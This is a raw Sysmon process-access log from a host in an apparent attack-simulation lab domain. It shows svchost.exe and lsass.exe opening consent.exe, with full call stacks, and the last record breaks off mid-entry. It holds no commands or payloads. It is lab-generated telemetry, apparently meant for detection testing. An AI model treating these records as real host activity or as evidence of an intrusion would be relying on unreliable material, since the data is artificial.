10341000x80000000000000001053933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.126{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+67500|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:41.110{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 